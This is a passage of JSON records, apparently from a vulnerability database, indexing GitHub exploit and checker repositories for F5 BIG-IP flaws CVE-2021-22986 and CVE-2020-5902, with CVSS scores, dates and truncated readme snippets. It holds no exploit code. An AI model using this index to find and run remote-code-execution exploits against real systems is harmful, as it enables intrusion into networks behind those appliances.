"AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T23:08:47", "description": "# CVE-2021-22986_Check\nCVE-2021-22986 Checker Script in Python3\n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-23T02:04:39", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22986"], "modified": "2021-05-21T00:55:58", "id": "48FD5EC4-10B3-5CB3-96C6-4D70E2A52EEF", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T18:30:29", "description": "# CVE-2021-22986-Poc\nThis is a Poc for BIGIP iControl unauth RCE...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-17T05:02:45", "type": "githubexploit", "title": "Exploit for Vulnerability in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22986"], "modified": "2021-12-15T14:41:40", "id": "F6F649DA-905A-5158-B6BD-5A1F1F740C68", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-13T09:03:21", "description": "# \u4f7f\u7528\r\n\r\n```\r\npython3 f5_rce.py \r\n\r\n-u \u6307\u5b9a\u76ee\u6807URL\r\n-f \u6279\u91cf\u68c0\u6d4b\u6587\u4ef6\r\n-c \u6267\u884c\u547d...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-21T07:40:51", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22986"], "modified": "2022-08-13T08:25:58", "id": "91A5A7DD-3544-5856-890C-F8D738DAC6F4", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-15T21:13:41", "description": "# \u4f7f\u7528\r\n\r\n```\r\npython3 f5_rce.py \r\n\r\n-u \u6307\u5b9a\u76ee\u6807URL\r\n-f \u6279\u91cf\u68c0\u6d4b\u6587\u4ef6\r\n-c \u6267\u884c\u547d...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-19T18:50:22", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22986"], "modified": "2022-08-15T15:41:27", "id": "4E7397B3-57E1-5961-BE00-E340DD46B130", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-15T21:11:57", "description": "**F5 BIG-IP RCE / CVE-2021-22986\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e**\n\n**Code By:T...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-29T05:56:21", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22986"], "modified": "2022-08-15T15:41:48", "id": "9E6B39D2-4F46-5C9D-81B9-32A2C96CBAD8", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T23:33:32", "description": "## CVE-2020-5902-RCE-Big\u6f0f\u6d1e\u5229\u7528\u5de5\u5177GUI\u7248v1.0\n\n#### \u5de5\u5177\u4f7f\u7528\u8bf4\u660e\n\u547d\u4ee4\u6267\u884c\u7b2c\u5730\u65b9\uff0c\u5982\u679c\u7b2c\u4e00...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-17T03:13:30", "type": "githubexploit", "title": "Exploit for Path Traversal in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902"], "modified": "2021-01-08T00:17:22", "id": "8CBB7F58-891D-5105-B269-029C59A9C3C9", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T23:33:37", "description": "# CVE-2020-5902\n\n## Summary\nIn BIG-IP versions 15.0.0-15.1.0.3, ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-08T16:22:53", "type": "githubexploit", "title": "Exploit for Path Traversal in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902"], "modified": "2020-07-16T16:16:40", "id": "4B25D88E-3B3F-5756-B942-7244492EB7F4", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T23:33:49", "description": "NMAP script for F5 BIG-IP \"TM...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-12T14:37:25", "type": "githubexploit", "title": "Exploit for Path Traversal in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902"], "modified": "2020-07-12T14:40:28", "id": "4C03A6F0-84D7-565A-B0D8-DE45D804A835", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T23:35:41", "description": "# CVE-2020-5902\nPython script to check CVE-2020-5902 (F5 BIG-IP ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-06T14:41:29", "type": "githubexploit", "title": "Exploit for Path Traversal in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902"], "modified": "2020-07-07T12:48:34", "id": "5B55C912-08F2-542D-B6F4-EE8AF664AEAC", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T23:35:46", "description": "# CVE-2020-5902-F5BIG\n`Just Run Command like \ud83d\udc47`...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-07T05:32:46", "type": "githubexploit", "title": "Exploit for Path Traversal in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902"], "modified": "2020-07-07T05:54:24", "id": "9FE15986-BAC9-5740-8189-23E26F8399D5", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T23:35:46", "description": "# cve-2020-5902\ncve-2020-5902 POC exploit\n\n```bash\nPOC CVE-2020-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-06T05:11:37", "type": "githubexploit", "title": "Exploit for Path Traversal in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902"], "modified": "2022-03-23T10:36:40", "id": "A423A009-0EEA-569D-AFFE-89EC01F7CDF7", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T23:36:02", "description": "## BIP-IP (TMUI) Scanner - CVE-2020-5902\nScript will run checks...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-06T06:58:29", "type": "githubexploit", "title": "Exploit for Path Traversal in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902"], "modified": "2021-10-06T13:26:18", "id": "1504582F-1A1E-5CA1-A07C-FB05DECB01A9", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T23:35:56", "description": "## PoC for CVE-2020-5902\nthis just sample PoC to...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-06T10:36:07", "type": "githubexploit", "title": "Exploit for Path Traversal in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902"], "modified": "2020-07-07T02:31:59", "id": "2BE2BF2C-B78F-5C34-A4D4-484F0E6B6D9C", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T23:36:05", "description": "# RCE-CVE-2020-5902\nBIG-IP F5 Remote Code Execution\n\n# Descripti...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-06T02:21:18", "type": "githubexploit", "title": "Exploit for Path Traversal in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902"], "modified": "2021-12-01T00:39:47", "id": "6102FE6D-37F6-572D-8877-F3A0D49FC22D", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T23:36:08", "description": "# CVE-2020-5902\n\n```\n _______ ________ ___ ___ ___ ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-05T20:16:07", "type": "githubexploit", "title": "Exploit for Path Traversal in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902"], "modified": "2021-12-15T14:39:45", "id": "BE88205A-26D3-5EFE-B8CC-828EE7E33C86", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T23:36:07", "description": "# CVE-2020-5902\n\nShodan\n```\nhttp.favi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-04T14:12:57", "type": "githubexploit", "title": "Exploit for Path Traversal in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902"], "modified": "2021-05-10T22:58:02", "id": "36AAE05E-CAAA-5F55-AA88-65599F1EAA1C", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T23:36:06", "description": "# CVE-2020-5902\nPOC code for checking for this ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-05T16:38:36", "type": "githubexploit", "title": "Exploit for Path Traversal in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902"], "modified": "2021-03-05T14:05:58", "id": "D8BEFAC3-BA4E-5E7E-8553-B512E126AD53", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T23:36:49", "description": "### CVE-2020-5902\n\n\n## Exploit for CVE-2020-5902 (bash ve...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-09T14:08:54", "type": "githubexploit", "title": "Exploit for Path Traversal in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902"], "modified": "2021-01-04T14:34:14", "id": "F2165DE4-7724-559C-A733-DE9F244DA408", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T23:36:54", "description": "<b>[CVE-2020-5902] F5 BIG-IP Traffic Management User Interface (...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-08-13T08:27:25", "type": "githubexploit", "title": "Exploit for Path Traversal in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902"], "modified": "2021-08-19T10:39:40", "id": "BC6A00C7-AE9A-533B-87DE-DD27240A818C", "href": "", "cvss": {"score": 10.0, "vector": 